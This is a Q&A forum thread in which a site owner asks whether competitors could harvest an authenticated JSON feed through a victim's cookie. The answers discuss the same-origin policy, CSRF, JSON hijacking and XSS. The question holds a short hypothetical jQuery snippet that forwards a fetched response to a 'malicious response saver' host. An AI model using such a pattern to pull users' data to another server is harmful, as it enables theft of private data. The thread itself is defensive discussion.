
We have a JSON web service that is used by one of our webpages to show "live" data. To get to the page, the user must be logged in. We are concerned about the ability of malicious sites (competitors) to harvest this data. However, I'm not sure if the problem we are anticipating is plausible.

Once a user is logged in, we store a "remember me" cookie on their machine. If someone were to build a site that made an AJAX request to our web service and convinced a logged-in user to visit the site, would they be able to retrieve and store the information from our service? If so, how can we protect ourselves against something like that?

For example:

Could a malicious website build a script like this to get our data:

    // the asker's hypothetical: a third-party page fetching our feed, with the victim's cookie attached
    $.post('their.secret.json', function(response) {
        // ...and forwarding whatever came back to the other site's own server
        $.post('our.malicious.response.saver', {save: response}, function(ourResponse) {
            alert('we saved your stuff!');
        });
    });

Since they are hitting our JSON feed, wouldn't it send the cookie to our site, so the user would be authenticated? And since they would be authenticated, wouldn't it send back the sensitive data?

tereško
TaylorOtwell

2 Answers


Absent some as-yet-unpatched browser vulnerability, what you appear to be worried about cannot be done.

A script on another domain will not be able to make AJAX requests to your domain. Nor can it load up a page from your domain and 'steal' that information.

What you do need to be concerned with as far as CSRF goes would be destructive actions via GET requests, which of course do not require any scripting at all. And all of this of course assumes that your site is not vulnerable to cross-site scripting (which could permit someone to 'steal' data via someone else's login).

I would think you would be much more likely to have problems with 'legitimate' users who are there to 'mine' your data, though. That's more of a business-level thing, though... aside from assuring proper logging to identify such situations.

Andrew Barber
  • I was able to mock up an example of making a cross-domain AJAX request, and I've seen numerous articles on the web that say it is a vulnerability. Can you elaborate on why it is not possible? – TaylorOtwell Apr 12 '11 at 14:23
  • I was careful with my wording to include "as-yet-unpatched vulnerability". It's not possible otherwise because all browsers honor that separation. If they didn't, anyone could easily create a web page which forced your browser to do whatever they wanted on any web site they wanted. CSRF would basically end the web, period. Instead, CSRF is primarily an issue with sites that don't remember the principle of idempotent GETs. – Andrew Barber Apr 12 '11 at 14:27
  • But here is what my overarching point really was: You are selling the information. That means people will get that information. Forget CSRF... you are giving people the information legitimately. What are you doing to make sure your *paid* users are not going to simply resell the info? – Andrew Barber Apr 12 '11 at 14:28
  • ...and I would like to see your example. My guess is you aren't quite getting the full monty there; You don't *need* AJAX to make a simple GET request - they can simply put an IMG tag on their page that does that. That's not what I'm talking about. – Andrew Barber Apr 12 '11 at 14:31
  • Example posted to original question. – TaylorOtwell Apr 12 '11 at 14:35
  • There are so many questions on this site and elsewhere where people are trying to figure out how to do cross-domain POSTs, such as this one: http://stackoverflow.com/questions/298745/how-do-i-send-a-cross-domain-post-request-via-javascript As I noted, making the request isn't hard at all - you don't need Javascript to make any cross-domain request. But manipulating it is a different story. – Andrew Barber Apr 15 '11 at 07:16

If you are afraid that an attacker is able to use the session of a legitimate user to retrieve JSON objects, you are talking about JSON hijacking. Whether such an attack is even possible depends on the way your JSON files are structured. Look up the term "JSON hijacking" for further information, or feel free to leave a comment with more details about how your application uses JSON objects. If you find out that you are vulnerable, adding a CSRF token will help to shut down any JSON hijacking attacks.

You must also make sure that there is not a single Cross-Site Scripting (XSS) vulnerability in your web application. If an attacker can use XSS, it is rather easy for him to harvest data by controlling the browser of a valid user. CSRF tokens are useless in such a case.

Demento
  • Thanks for the tip on JSON hijacking. I looked up some articles on the topic, but I'm confused as to why "object wrapping" protects you. Could someone not still construct a jQuery (for example) AJAX request and then post the response back to their own server and write it to disk? – TaylorOtwell Apr 12 '11 at 14:24